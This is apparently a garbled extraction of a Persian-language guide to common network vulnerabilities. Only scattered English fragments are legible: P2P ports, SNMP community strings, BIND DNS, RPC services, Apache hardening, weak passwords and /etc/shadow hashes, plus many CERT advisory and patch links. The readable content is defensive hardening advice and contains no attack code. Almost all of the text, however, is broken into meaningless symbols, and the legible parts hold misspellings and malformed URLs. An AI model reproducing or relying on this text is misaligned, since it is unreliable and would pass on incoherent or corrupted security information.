F $() * % ! _0 F 6* 5 -, < < "), ) ) F) & U 1) U# ^P SL % ! P2P ? I5 6 +, ,G ^ 0, < 3 W 3 j1 #P < ) 5 - Y "), ) 6* : ,, 2 e G P2P a " \ 2 b -, < - Y T) , 2 P 1 & ?@) < ! ". 
0(123& 6 " - Y d * 4 4 ) " 6* ] + ,6 3 TP, 6 " : #P< ' y 2 < • 6 6 b C 5! application layer strings ' E F• - Y P2P 0 -, < download . T I #P< " - 3• 6? # _exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip 0 "@ 'D j6 #P < " - 3•Z>'y ! " %& (E )Y 7 B 5! 6% '] $l ' R 4 S @ : % • b • 456 123& DY/ I 5 a ? " ? H ) dowmloading 6 ^P | < " - Y • T G ? " ? " g 6 " - Y - . . #P< 6- N ^P " - Y • T G ) #P< " • - 3• >' 5 0" E ;N8 6 &'( C L3 &'( SL H 5 3 • 15G ? 0, < P2P T P2P 6 b I ) 4 -, 6 U ) " - Y • -,< - Y 67 4 _ ) ) | F) 3] y P2P ^P ' 0-,< ( N h) ) -P2P + , B'• • C L3 #P <y @ 6 &'( " & \ 2(18 1 5 ") - Y • + ,C 2 _••{{ $††}Š $†††† - 5< TCP 67 4] Napsster • _‹••Š $‹••p $‹••w - 5< TCP 67 4] edonkey • •s‹} $•s‹• $•s‹Š - 5< TCP/ UDP 67 4] Gnutella • 6- 5 < TCP 7 4]Kazza • TCP/ UDP 7 4 ) www wp‹w - 5< ! " % &# , Simple Network Management Protocl (SNMP) -N 5 SNMP " - Y 784 2 ) , , #4) ) - " y #4 I 5 ?@ " # SB g $T 0 < 1 )$ I 5 SNMP %# ) 4 " - Y TCP/IP - Y P ' 4 #P < 7) Y 6 6( ' - ) 6Access point $ 6ˆ K $ 6 ) $ N4 ' 0 < SNMP , 6( 4 ^ 6N 3 2 ( 4TP B % , 6- N $SNMP -, < - Y b o F & $ SNMP N& S ^P % < 0_, 5 - Y ] #P< ) 3 $l '7 !89 " - Y Q 0, < R4 S @ ^ ? 5 SNMP u - 5< * $SNMP 0_, * L3 7 L _U ) 3 ,K B! " ,G b R4 S @ ^ < $h _?@ / X ! 6- ' ) !89 -,< %L 3 M,6nH ) S -,< K 6v 6( 4 , K " $SNMP * I5 j ,4 ] < TP, P " - Y 6N 6N O* H e 'j 4 7 L ? , 6T, " - Y - 5< * #4 PG ) , K R4 S @ ^ 3 , G ) T G' SNMP ,G " $SNMP ) ) ,1 " I5 7 K &F SNMP 6( 4 " < 0, < R4 S @ ^ , ) , ) 7 !89 Z ', 2 5F ) H $l ' R 4 S @ ^ - Y SNMP 3 785/ & c L. $ N #4? bP R4 S @ ^ 6* 5 i: j &' I 5 ? , 6N SNMP 6A) " - Y (,! 0, 5 ! N " $ #P < A) " [ P e 'j 4 A N 0,< 6 0, < 3 gV " PG ) , K (& # ) -,< 1P ^ P SNMP 5 , H ? G -, < & < ) 6 3 7 & E ) 7c@ 2< ] V ^ - Y 6A) 6( 4 6A) " [ 0_78# , 6A) 0, 5 -, < - Y , 6A) " $SNMP )Y " ] DOS \ " 7) Y 785/ ( E ? ' 0, < I5 $qs …pqqp CERT – h @ R4 S @ ^ 0 5 -,6 0 6N ! B 5F " $ 6( 4 " * ] SNMP - 5 _ - Y $ #P< y I 5 -,< - Y : I K 6N H , 5 6T, " - Y 6A) W L3 ,1 K ]0, < ("c , U) ? G SB g )0 2#5 #P< , 7c . 
A) SNMP0, < Point 6- N U 1) U# -, < d * 0 3 $UPS 6N ^ ) $ 6 N4 , 7) Y /f =GX % 1 , : 9P Bridges ) access % ! P 785/ &1@ " % #4 B5# I 5 -, < - Y SB g SNMP " 0 #P< 7 & E $ ) SNMP , , b ) Windows Service (&B SL 6* $SNMP 6 SL $ #P < ) 6 7) Y embedded e 'j 4 7 L $SNMP 5 TG'"), ) F 2 6* 0 < - Y 785/ Q 0 $() * * SL Q 0, < - & - 5 "), ) % ! +, 6* 5 T G') SL e 'j 4 7 L l 'U ) SNMP l ' R4 S @ : P 5 CP 0, -,< K W L* #P <% ! 6 0 < ,6 3 + $ #P< -, < % L ) F 5 $SNScan N 4 6N ) 0 5 - Y . Foundstone. http://www h @ n 9 " " - Y ? # # 0 SNMPZ F ) SL W L3 GF ? ^ % ! T G'd * -,6 ) " - Y SL ) "b 5 I5 A) " ? ) #5 ? ? <" 67 # n.7 a < ,6 3 - "2 Com/knowledge/free_tools.html ' $ 2 netstat w•p ) w•w ) ! ". /0(123& SNMP SL I 5 ("c 7 B 5! $SNMP " b3 ) 6- N H,, e G ?@ ? ("c 7, U# , 0 KF 0 (E ( E 2 6& 7 L - 4- ." )- @\X 4 ) F) N 4 6 @ " U4 (E 6U ) SNMP E F) 7 B 5! 2 netstat-an H,, )S @e G $SNMP -, < - Y ) e 'j 4 SNMP Community ] 13 F) _ P ! h,/ % H SNMP Community F) Community SNMP Y* F) 6 < ! " %& DY/ 7 ,H ? 0 5 ") 456 123& $l ' R4 S @ : % DY/ I 5 6, " -1 < $( ? ! "+ , I 5 $SNMPv3 ) 6( 4 , K 27 456 SNMP ? 5 TG' g ?@ " - Y 7 ) X (,! 7 P T, " - Y _?# 7 Patch * 2 3@ ? $? , $) ) , 1 7 L* " TCP/UDP w•w 7 , 4] , K5 0 K6 ),. agnt b ^ b agnt 6@ B' #P < (E 6 % ! SL $-, ) ) P $ ) 6- ,1 b 3 , ? & P A R 4 W L3 T ("c T P !89 y SNMP 3 3 6N " ? 6* B'T) ' " - Y 0 ? 5 V8 w•p 7 4 ) 2#5 l ' J) 0 $?@ " ,G ) pqqq"), ) 6 9 F) F 3 7 L l '7 B 5! ? 6 -,< K SNMP B SNMP agnt b 6 6 N& SNMP " - Y 7 * l '7 B 5! 0_TCP/UDP ) X # - Y SNMP agnt ] 6- $CERT Advisory CA-2002-03 5 5X j* 0 5 GF [ 6& ? G ? 1 ) $,< Q 0 (E ( E IPSEC & ?& B' ) 0 < +H ) ` 6 ?@ " - Y 7 ) X (,! 7 +, 8 456 SNMP ? 5 TG' g I 5 $SNMPv3 ) 6( 4 , K P T, " - Y _?# 7 W 3 " 2 0 ) ) 7 $) ) * SNMP " - Y 7 P! L )- h,/ % H g , O* 0, < )" @ W L3 3" ? N& 6& ? G -, < - Y ] community - Y _ ( #. ] 6- ("c : 2 0 I5 N u& ("c "W 3 P F 7 # " - Y (E P ! 6& $http://www.sans.org/resources/idfaq/snmp.php h @ 6 ),. -,< ' -, < K 0 b) w•w 7 B' #P< ) ) 6- l '7 B 5! 
0_TCP/UDP # #40 4], K5 (E $-, < & 5 $ , F) F 3 7 6subnet 2 SNMP " E ' B I & - Y SNMP 9 w•p 7 4 ) TCP/UDP L 6N , I5 C ' ) X y # B' , 0, 6 ( E Q I c2 ' R4 S @ ^ 2 U 1) U# !" 1 23 4 0, <P 7 !89 " ) 0 ) %K 25 : -, < =! > ?@ 56 $ 5B !C 8 ? , ) 5L M 9 A 'D (E ! 5E 2' /) F &1@ 6 GH ) 5 2' H? " ?@ P 4) " R4 S @ ^ 3W 3 P B 9 F) % 1 , ' ?5F ) - 5 - Y -,< 3 < $ 3 M ,6 % , , N ?# - ) 6? " & 5 ?5F ^ 2 " S @^ N &1@ ) S 6@, 5 D Y/ c ) [ 3_ O * 7 < \ R4 S @ ^ ) 6 Y/] ) X F 78# " V, ,G 6A) 2 , ,3 %K " 6 O * M,6? G Cod Red ) % ! 7 !89 ? @ > GP 8 $ B I 6 ? Q 6U ) 6 & $ ?5F 0, 5 ) 6( I RN6 2 #P < E ) 6 " - Y Z I N ) ! Y 785/ T) , % ! =GX ^ N` 6?), ) - # M 9 ( &@ I J 0 ,G 6 - 6 O* I 56$ % ! -") P % ! : ), F 7, , , - . 6; . " - " M 9" ) , < % ! @) &' * + # $% ! 6 R4 S @ < b R4 0, < ) U# R4 S @ ^ F) B !$ ) 2 R4 S @ ^ R4 S @ d * N 560 " ,< ,6 3 K 6 'G " U4 2 <) , , e G % ! $ R4 S @ ^ " 6% c 3 6 ! 5E 4 63U $ 1 =GX N 4) B - . % ! 6 R4 S @ ^ -, " ) <@ ? @ ^ &1@ ) ! ? " F) " [ < )@ 785/ ) 7 , , SB g $, 6 '?5F #P <) F ? , " ) 4 , 1) $ - < ?@ R4 S @ ^ " % ! 6 S 0 3 =GX I bP G ) i: " - \ 785/ F -, 5! -) - -") K6 F - F , 5 - Y % ! U# R4 S @ ^ R4 S @ ^ ("c 6%5G1 % < B5# ) , Y 7 !89 ? F 2 5F ("c 7 ,H ) 6 I ;&2 - Y - ? F i: 0, 6 ( E ) - < b f ! "M &# ( $ % ! " , G 785/ ? ? G _7) Y 2 ? 6 # $U# 0 6 * ] U# $ -,< ( E - ) a- 5 BIND Domain Name System Remote Procedure Calls (RPC) Apache Web Server Generl UNIK Authentication Accounts with No passwork or weak passworde Clear Text Sevices Sendmail Simple Network Mangement Protocol (SNMP) Secure Shell (SSH) Miscon figuration of Enterprise Services NIS/NFS Open Secure Sockets Layer (SSL) BIND Domain Name System ) - $ (Berkeley Internet Name Domain) BIND &'( h - Y DNS_Domain Name ] " BIND 0 / 5 IP h @ _http://www.srco.ir/ a #P < \ " C L3 $ 785/ ( E ( E ?@ I5 S ^P 1 ) $, - - 4 # (E ? ,6U) M,6 0, < R4 S @ ^ ) -, , !" #4 DNS T# < ") BIND K6 j CA- CERT 785/ N " , 5 dOS \ K : l 'F 6v 4 T " 0 H ?@ -, ) - Y DNS ;! 
BIND -, 6 U ) Dos \ " F >/ 0, < R4 S @ ,G % Z #4) W ZF $ Dos \ " F B 5F " 0,< " F ! L3 ) X ", Cache < TP, ^ -, < = 7 K &F Advisory2002-15 H Overflow \ " 3 : Resolver + ^ ") < " - 4 F ) DNS 3 2 $ 3 7 K &F ", F) : 5F 2 6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 , ,, 0 5 " ,G " 6 N ") 2 0,6 <R " R4 S @ ^ , CA -2002 -19 CERT Advisory 1 0 " F $ " $l '785/ K6 3 # 1 0 E ? & ) 9 785/ 5 $ 6% 'S : ? ' I5 ? , $ 5 ,H ) Buffer Overflow =GX ?@ ?5F < TP, , L Bind deamon ? @ ) l '% ?@ " - Y -,< ? G ? 5 M 9 ? , ("c 6 @ (, ! a, * 0 (, ! ) DNS U ) <8 BIND ? , )- F I5 785/ ) O * _Dos] Denila of Service ! 6U ) g7 % ,P I / - N F ) BIND " - Y ?@ 0, - I] ? & - 4 , R4 S @ O * /) N ?@ " ) - Y l ' GX) " ? 5F - Y @ , 6 6 @ ?), ) 1G' I 5 2 3 PG g 0 #P< 6- '784 ? G -, 6 U ) F " ?5F 0 R4 S @ - 5 U 2 , 0, 5 - 3O * ,6 3 BIND " SL ?@ ) * 1) U# Ž6, 6 U ) 1 & S - $() * , -, < K BIND " * # +, 6 ? G? & 5 C P , #47 0,< ,6 3 + ) ) K % ! BIND " - 5 6Patch 2 3@ " - Y K ? 59 BIND * ?@ " " - Y 7 SL BIND # 5 % S @ T5 / $,< -, Patch % , 6 3 j 5 X.Y.Z 7 Level Patch ) ?@ ) " ?@ ? )- , N 2 3@ " H 0 ) Z) * Symantes 6 @ -,< ( N N 4 - Y & $ I " ? R4 S @ ^ d * P 3 $ 0 < ,6 3 4 " BIND bP ) -,< F) R4 W L3 Y$ B -,6 X * N 4 2 3@ 0 5 SL # 5 2 ' ISC >! $ BIND 6-) 0 I 5 DNS R4 S @ ^ * 2 3@ $ 6, 6 6 ! " %& a / -,< SL BIND * F 6 #) " -,< 2 3@ SL " -, < K BIND * N ,1 b 0 5 % * 7 K &F -, 6, Version 9.2.2 v bP -,< SL X !] -, 5 ,H Q L ISCb ' )- 6 -, 6, $ 7 BIND # ^ : ? (N / ? 59 BIND * ("c 7 !89 v named a 0 3 * ( E _-, dInternet Sofward Consortium :ISC ! ". /0(123& % nH 456 123& DY/ I 5 ) • l89 & named ?@ ] BIND deamon ? 5 TG' g _ N 4 I 5 0, -, BIND &'( ' ? DNS -, 6 U ) I ? G _?@ ,E ? 5 TG' I ] W 3 7 K6 u 3 0 5 MR/ 6 )? , ,1 b 6Patch -, 6 U ) -,< K B5# 7 !89 ' 0, 6 Z Checklist j* ) CERT " * N (N 2 3@ " BIND -,< K 7c T5! " ) " • I5 ?@ ?# 7 2t 5: SL : 0, K5 - Y $ UNIX Security Banner ^ g * j 4 ) 785/ ? 5 BIND GH ) * - 5< -, ` 4 ) MR/ BIND " • I5 Version String 0, K5 2 &N F _ named DNS servers) % ' DNS [? 
, 6U) Zone 7c Zone 7c C ' T GH ) • ?# ? # _secondary DNS servers], K5 6 'Domain ^P Child ) Parent ^ P ? # " % ) T G' g 0, K5 - Y _Forwading] y #B 5! % DY/ 6 Domaion R )] Delegation ) ') _ 1t • glue fetching ) Recursion ? # I5 0, K5 TG' g DNS Cache i . 5 ? H . ) named" " - Y [ non – privilage : ? G BIND 2 Privilage h @ " BIND 9 - 5 < * DY/ , K5 ),. • I5 BIND $ Z F Chroot 0 0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @ BIND -, < = R4 S @ ^ bP ) 3 785/ % DY/ I a 5 - Y h @ " ISC BIND 0 h @ " ISC 0 : Dos R 4S @ " ? : • - Y http//www.cert.org/advisories/CA-2002-15.html BIND - Y 9 "+ 8 : DoS R4S @ : 2, http://www.isc.org/products/BIND/bind-security.html • 6 ) BIND 25 SL I 5 ("c 7 4" - Y ) 6@ ) Running the BIND 9 DNS Server Securely a h @ " ? 0 5 - Y Afentis h @ $U c -,< K 7c <@ Remot Procedure Calls (RPC) K62 ) F H B 5! - N F F 0, < U) ( E K I " )- T n 9 " () ?@ " - Y RPC - Y NIS ) NFS % 'V < $ ) - " , I #P < -,< +" 6 ; G RPC ,G 6=GX F) 6U ) Q RP @ ? 5F RPC 6" E 6 " - Y T % ) ) 1999 T RPC ,G RPC " - Y 6 T) , I ?@ " f F )- T 5G ,/ " j 0, ) H"E @ =GX S DoS \ " 785/ Q R4 S @ : ) : %1 , $ # g F I F) & C 3 0 0, i: & @ ' )- y 6, -,< = - 785/ 8Q RPC \ ' 7 ") 6U ) RPC DCOM ;! "), ) ?@ ) U R4 S @ ^ - $() * -,< SL RPC F 2000 ^P : # ZF 3 M ,6 K6 - ( 2, , 0, < , 6 3 =GX 6 -,< YB* 785/ +, 1 ) U# 6* 5 0, < P , , e G ! ". /0(123& " # Z F" ? $ rpcinfo" a, RPC Program ) - @ R4 S @ ^ ) N 4 " - Y RPC T) , 6U ) RPC SERNIS Number 100083 Rpc. Ttdbserverd P! Rpc . cmsd 100024 Rpc.statd 100005 Rpc.mountd 100232 sadmind 100235 Cachefsd 100249 Snmp Xdmid buffer Overflow 785/ n 9 " C 5! RPC H- Y Z 6- 100068 ) 6:3 W L3 ' ) ("c ? # 2 $ Buffer overflow R4 S @ ^ _O * , 7 L SB g] j4% H ) Z:3 : , <P -, " b RPC , 5 F , 5 T , B ) h / K6?# O * , Overflow & @ 1 " E RPC g- F =GX 4 - Y 6U ) l ' R4 S @ ^ ( E ,! " " ,G # " & @ 0, 5 2 6 - Y 4 ) X RPC " $ I'/ ?) 1 - 6U ) " K6U ) : . " Z F% ! Z F T 5G ,/ " j g 6 ?# , 456 123& P% DY/ I 5 • 6MR/ ) ? 5 TG' g 0,< F) ? 
@ MR/ ?# $- , 5 F ) - " )"E RPC ) ) 6 'F ! " %& a B ! 0, b ' F ' - Y , 6' 6U ) 5 #P < ) ?@ " • -,< K Patch 2 3@ SL a 0 - Y _http://sunsolve.sun.com ] h @ " U c http://www.ibm.com/support/us 0 a h @ " IBM , &'( AIX - Y http://techsupport.services.ibm.com/server/fixes) ) http://www.redhat.com/support/errata a h @" U 0 7 L http://www.debian.org./security - Y Patch 2 3@ SL ) 6 @ 9 1 I5 E F7 B 5! 0 <( E 5 135 7 4 ) RPC portmapper 0, 5 V8 T) ' ) UDP ) TCP , K5 V8 $ l ' J) " 785/ 5 % 785/ " 3 B ^ 32789, 32770 Loopback 6 DY/ windows ) i: ^ B! _ UDP ) TCP] 111 7 ^ ) F c $ KF F [ g B! , g 4 5 4 4 _UDP ) TCP] 67 4 ? 5 TG' " - Y 0, 5 5/ 1 ) - PBuffer overflows 0 TP " %/ NFS % ' 6 $ , ^P a 6 P IP/ ? & " - Y 1 , 3 b'7 L R4 S @ ^ - Y " 6h @ " ? RPC ^ % ' 6 j 4 : , #4 nfsbug" " - Y B5# 7 !89 R 3 a 5 http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html http://www.cert.org/advisories/CA-1997-26.html http://www.cert.org/advisories/CA-2002-26.html http://www.cert.org/advisories/CA-2002-20.html http://www.cert.org/advisories/CA-2001-27.html http://www.cert.org/advisories/CA-2002-25.html http://www.cert.org/advisories/CA-1999-08.html http://www.cert.org/advisories/CA-2002-11.html http://www.cert.org/advisories/CA-1999-16.html http://www.cert.org/advisories/CA-2001-11.html http://www.cert.org/advisories/CA-1998-12.html http://www.cert.org/advisories/CA-2001-05.html http://www.cert.org/advisories/CA-2002-10.html http://www.cert.org/advisories/CA-2003-10.html http://www.cert.org/advisories/CA-2003-16.html http://www.cert.org/advisories/CA-2003-19.html Apache Web Server 0 ) 5 O) ? , 6 U ) 78# (A-2002-,CA-2002-2717] - a 3W 3 R4 S @ 6 ' " 7, , F) & PHP ) CGI 0 bP ! ?@ ) 4@ -, 6 U ) _DoS] U ) h / 6- -)8! 6 „1# & O) -, 6 U ) " $?@ 4@ ? `56 1 ) < R4 S @ ^ R4 S @ ^ F) 7 # _Apache] O) -, 6 U ) 4@ , ) 6T)„ 3W 3 R4 S @ ^ " 4@ $ _IIS] ' # ) %K 0 6=GX 2 1 ), ? 5 TG' g ) 6% '2 3 , - 9* )j 5 ) - " -, 6 U ) _ 3) # ] -, 6 U ) ? '- 9* $() * ,G ) e '7 L 4@ $l '? 
# , 5 - Y "), ) 3 W 3 R4 S @ ^ 4@ 0, <P -)8! 0 4@ Z F SL $ U I =B* B! , & H U# 6 1) U# " 4@ +, N 6* 6* & ) 5 " " ? " \ 2 0 5 SL & 0,< + 4@ SK-, 6 U ) R4 S @ - . W L3 ("c 7 !89 S a 5 - Y h @" ? ! ". /0(123& " 6@ I5 6h @ " ? $ Apache 1.3.x : • http://www.apacheweek.com/featurity/security -13 h @" ? Apache 2.0.x | http://www.apacheweek.com/features/security-20 • R4 S @ d * ah @" - Y - . I 5 ("c 0, < P '7 !89 G X) Z W 0 "2 ,Y $-,< - < 6h @ ("c 7 4) L3 & http://httpd.org/ ! " %& a K "7 4$ 456 123& 4@ O) -, 6 U ) DY/ I 5 • -,< K patch 2 3@ SL " ? 59 " 6 @ http://httpd.apache.org h @ " ? I5 : 2 0 5 - Y levels Patch ) 6 * h @" ? $ 4@ Q code Sourde 6* 6Patch 2 3@ -, < K I5 http://httpd.org/download.cgi 0 5 - Y h @" ? GX) 2 3@ ' ) 6 @ I5 0 5 - Y | http://httpd.org/dist/httpd/patches/ " ? $ 4@ 6* code Q Source I5 0 5 - Y http://httpd.apache.org/download.cgi h @ h @" ? 6Ptch 2 3@ -, < K 0 5 - Y - Y ? @ " +F ? G #B 5! mod . I 4@ ( R4 S @ ^ " ("c : ("c 0, - "2 % 5 2 4@ ) ) $ I 2, ), ) X 6-" .ZF 5 _CA-2002-27] –ssl % - 5 - Y SSL O F$ ? G 4 E " E %H ,/ W 3 0 4@ 0 < ,6 * $ chroot Login 8Q 0 C / 0 ) - Y •|• G', c 0, 5 $ -, 6 U ) 0 6) I5 ! patching " ? 59 ,B 6T)„ C ' - < # 2 Open ) 6 @ http://www.apache.org/dist/httpd/patches/ % ! ) X ' F" l '-) ,E = G ;! B 4 Chroot ) •ROOT , E = G;! ? G, Chroot 0 session F 6% ' 5 -,6 F W L3 H $, 5 , 4 6 ),. $ l ' ) E $ /chroot ( U) 4@ ?@ F 3 G', - <& S I 5 O) -, 6 U ) 0,< &'( 0 - Y ) 7, F 3 * " 9 1G'W L3 , 5 3 0 ' # ("c ?@ K loggingW L3 '# < ) [ U) : 6% ' 6 '? @ a 5 - Y g ' 6T)„ I ) , " S ?@ I5 B "+ " , 6A) ? G$ I I5 ) -, 6 U ) g ) R3 4 ) 6 BH $ logging 7 B 5! H )"E B' ,G ("c 7 , 5 ? @ &1 @ 6% 1G'\ 4@ -, 6 U ) ("c 2 6 0, 5 ?# 4 , ?# S •c 7) Y 2, 0 6 6 6U) , F 7 !89 " W 3 I ) •c !89 !89 +P 2#5 W L3 3 4@ Chrooting ("c O) -, 6 U ) R4 M :G 7 L c 4@ -, 6 6- Y Z W L3 F) chrooting -, 6 U ) F %K 15 / ) K W L3 6 ,' 5 F) chroot " z 3 ) % ! + P ) < 6 #6 6U ) ?# $, 5 " g@ P F7 [ , 9P 3 0 5 Z F chroot b. ?@ b. 
< TP, " H /chroot/httpd ("c 0, 5 6 ' B : ) F & 7 2, 0 < , 6 * ^P ,6 * I 6j* # 2 CGI,PHP 0, @ 4@ # F c 2 0 1G') Z F chrooted 7 L '# -)8! 0 W 3^P > P l' S ),. : 8Q 0, C 5< ' 6 '$-, 6 < K<@ (E < @ •c I 5 0,< ,6 3 http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x 0 <- Y http://httpd.apache.org/docs2#5 -, @ j 4 b < F h @ " Apache ) )Y 2.0.x 0 < - Y 2.0/logs.html ) CGI , PHP " # ? ) •c < P [ l ' GX) 0,<P ' ,, $ ( ,H $ - Y Œ # =GX POST ) GET W L3 S j< 4 0, 5 6 'O) 6% ' ("c &1@ ? j &' I 5 ) O) -, 6 U ) - 56 l ' ^ P 0, 5 6 _detection Intruder] 25/& N 4)- 6 ^ mod_Security n 9 " , R 47 6 . 6 „ 1# 7 B 5! ? 5 •c 0 5 POST ) GET bP O) P " - Y Z ) F ModSecurity d * •c F 5/ 0, 5 " K N 4 F " $ ModSecurity 4@ -, 6 U ) -http://www.modsecurity.org/ -http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126 a # 4 N ], Z " 5 T G' g I5 ,! # , 5 F 2 6? " 0_,< < F 6 ' Apache User Id H , 5 6 ' User Id F : ,F ) - Y 7 #B 5! - . K<@ , - 5 - Y 4@ . 6 ? # 2 SuEXEC 4@ ? . CGI ) SSI ) 6@ P I5 ) : 2 a 5 - Y " / 6 2 , 0 , < O) -, 6 U ) L 3 CGI )SSI -, < < ,< ("c j 3 $ setupid Root $ User Id % b " - Y ) X # 7, , S 0, < , 6 3 MR / $ ? 5F ) X SSI ?@ ( &1) -, 6 U ) P 7) Y User Id " - Y - Y ) F) ? @ ) PHP,CGI,SSI " F ) 2 < ?# ) j6 ;! ) PHP,CGI,SSI F ? # $ SuEXEC 0 < - Y SuEXEC " 3 'P 9 ") ) SSI,CGI,PHP # Server Side Includes 3 , 6? " 06 # ", 0, K5 TG' g # : SuEXEC ( 3 <) S 0,< ,6 3 N 6h @ " ? 6 , # 4 (,! 6- Y/ SuEXEC " http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x 0 <- Y http://httpd.apache.org/docs- h @ " Apache 2.0.x 2.0/suexec.html 0 <- Y ) cgi- bin 6 0, MR/ $ 5 e 'j 4 B / " S1: . W L3 6 # F a 5 HTTP header ("c ) ( E 6 l '\ X 40PHP " 23 - < W L* ("c 5 ) 7 !89 K ; ! C ' 6 )- # % < 25 z 3 1 2 4 ? 5 T G' g a B5# 7 !89 safe 1/ ' PHP h @" ? W 8Q 0 C G X) P I5 ' X 0 < Corss Site Scripting XSS % h @" ? L3 2 http://www.securityfocus.com/printable/infocus/1706 0 5 - Y T)„ W L3 2 " ,G mod_Security B5# 7 !89 -,6 Injection SQL&XSS % < R4 S @ ^ 0 5 - Y 1 )„ " - Y DY/ ;! 
, 0 5 - Y &'( F " ? 59 T L. # : ) &5 2 0 56 &K/ & # _ http://www.cirt.net/code/nikto.shtml h @ 0 <@ http://www.modsecurity.org/ 6 6& " ? ) CGI % H] Nikto )j 4 6& 2 P ,Account 2N P 2 9P % G $? ,K ,6 3 N $? 6 <) 6, ) Q0 b ,K f ) T) , -,< K P! 6& $ C 5 e *f 2N P <) $ P !& " - Y !89 $- 6 )? ) % ' DY/ I ?@" 0 6) 6 '-,< d * ,6 * E + + ?@ " - Y ?# $? H $-,< - P , K " U4 0 < 6" E ) 7 " F $ -,< , K + ?@? "E 1G'$ SB g $ -,< , K + ?@? "E 1G'$ SB g , KF) , ?@ (E DZ H$ E N`6?), ) ?@ =GX ) ) /j ) R 0, < ? " b P !& : P! & ^P < TP, -,< K 6account Y 6% 4" 75 I # u P! F) 2 ) X$ 5 - Y , N) = G 0 < 3\ P ? " € + " ? " % < P !& • -,< = G Account P !& 6& " ? S • DY/ (,! 0-,< = G , account E ?# $ F ,H ') = GX 6 &'( 4 5! , B <R hashing , " -,< & ) -,< N -, @ DY/ 2 N1 S P 3 h 83 ( '$ hash , / < ,6 3 SB g F) 2 )b P! & • N1 $ hash )E $ -, < 3 < $_ ?@ ,6 • 6' P! & Hashing ) ) , , Hashe , 0 N& ] P ! )% ! 0, 5 , / B 5! -)8! + 2 1 ), ) 2 $ , 6-, 4, -, < 2), " I' 6 1G' P ! & ,H ' ) = GX account P ! & ,H ' ) = GX 6& ( #. - < \ ' i: 21 ) a 0 •c H ,F 7 , , e G - 5 account R4 S @ ^ ,6 3 !89 0,6 ,F , , , % ! 9 " )- ) -, ) , K " U4 ? @]0,< 0_ F ) -, < = G U 4 ,< 1G' # , P !& 2 " U 4 ?5F ,63 P [?@ , -,< P ! & 2' + H 5 $ ?# 3 1 ) - 3• 6% 5G1 $ F ?@ - , 5 ,H 6& " - Y 0 P! & )d* 7 P !& ? " S d GP$ P! & ) ( #. 2 = G W L3 ("c ! ") * ) User ID & h ?@ ? ,K, @ ' 0 ? ) ,G ? $, 5 DY/ , 2 P ! 6account , , ,F ? " F <d * 6 'F ) " - Y < , ) " g@ S P! & # )- b hash ) 6 'hash d * ?, N ], 5 I 5 MD5 crypt 5 , H • Y% P !& ? ?@ " : 5 $l ' ,6 3 %. ? , K ?# " etc/shadow % '0, P! & " 2 0_, (E ? 5 - 3• 6 2 1 & !89 6% 'V < K6U ) I5 - 3• I 5 etc/shadow u -, N10 5 - Y & SL b P! l' 6& ? 5 0 I 5 -, < + " H ("c - 3•) hashes N1? 0 3 A8 $ cracker C ' - Y hashes S 4 /etc/passwd % '?, 3 F 3 % H root 3 - 3•W L3 ?, 3 ?# ) 2 #< N1" S " 5 b 6account # B . b < # P !& ) /etc/passwd F) #P< ? ?5F ) ? " #P< I 5 ? 5F 5 L hashes /etc/shadow BH 0, < b P! & P ! ! ". /0(123& ) -,< <R V < !89 + ) ,< K6account " # - Y 6& " ? 
'& , < h, / % H 6 ,6 3 , , 2 e G < #40 +, )% ! + H ("c 25 d[Network Information SystemZ NIS , NIS / 0 ! 5E % < ) 6 ' #P < ,G , (Mapping) U ) ?# 7 !89 ) - 5 %5! 6U ) H Network File System (NFS) , 6, hash P ! P ! % < NIS , 6& #4 6& C 85! ) 6 '? ) NIS+ P! * ]l ' 6* , %# ), !89 I #P< 6U ) 3 6 ? @ ?, 3 ?# , - 4 , ,F 6 * 6& " 6% '$-, @ %5G / 9 5 I $ NIS " -, < " N ], <P hashes F ^ ("c ^ P 2 )- 0, H,, e G C 5! LDAP ("c ( #. # 4 ) I 0_ , u -, ?@" - Y , F SL b l 'b < # 2 56) - %# $_, ,F 6 0, 5 -, < " ,6 3 F) F) $ ) etc/shadow b 47 # ' b P !& =GX a I - < $, - 5 V 5 ,H ? j4 - Y N ,G 3 $l ' # ) 0,< 1 ), 5 ? , 0, 5 - Y : c 5G C 6U ) #4) )S P ! ) N ("c 4 5 6 GP $ - 5 6& 7 L " %/ P ! 6& =GX % < SF ("c ? , b 0? " % )= ! 5E SL g 6U ) , <P 456 123& 6%5G1 G? a,<P S " P ! & ,H ' \'2 P 5/ 6 e ' ! " %& " $ 5 SL 7 B 5! # ) X ) 6 " )% ! K6account ) 6account ("c ) - 5 6U ) < 6? " #P < )% ! b 2 g )? ," % , ^ 2 9 / I'. : 6A) " : ) X g L 6& ? < TP, & ) = GX e 'j 4 7 P! ) h, / ? # $ , account ? 5 TG' g ^ $ #P< ) ! 5E 6& d * 3? " 6SL 0 , P ! hashes )2 - b #. 5#. ? @ ( #. K S &' * " - Y ? P P ! d * N F- 5 $, < -, < 3 < 5B A" @ $ 6? " ?@ )- -J ) " 3? 6 P! ! M) / ) ,! \X ) 5 $O 3 P !& ? ("c 2 I 'L c 9 < 6& P " %5 Q O* N F2 0 <- 0 , K5 = G 3 -,< 3 < ( B' ( ) " )@ ( $O W 3 (E * - 93 ?@ d * $ & " $ " " U (8! 6& ,1 <P?@ " I 5 ("c % 5G1 " ? T ("c A" 6 #) h &N F E P 785/ ?, < F 7 H? - - < # 2 ?@ _ H I ("c 0 )@ ?" 2 ), " U 4 0_‚ , P4 ) 4 " ? 59 ] " ) -,< 1 ) K5 - 3• -, < F I5 ? I5 @ ? !$7 P ! 6& 3•" M, 6] , <P %# $ -, < = G 6 % 5G1 P! P !& " ) - 3• P ! %5 # / ) 5B E ) O * W L3 5 MR/ $ 5B -J) password d * 6& P = G _pa$$w0rd], 5 - 6 -,< Y P !& $_ -J ) M) / ) KP Y1M) / " ("c Y 3 M) / • ,G 6& O* , , 0_? @ =B* P! $ 5B 6M / 2 1 ) 2' ] ) # : 0, < ,6 3 crack $ 0,< -,< h PH (E ],< "password" ( K6 P! SB g 0 = G - . W L3 2 ? H& " 6 P !& 2 M) / % ,P ( ,H C ' A) 6A) " - Y ,6 3 785/ " \ 2 KP Y1M) / " I5 ) - 5 )6? " ?@ " ,G 0 ' ? "W L3 ) P !& d * " - Y ) ,G • " ? 59 6? ' T /2 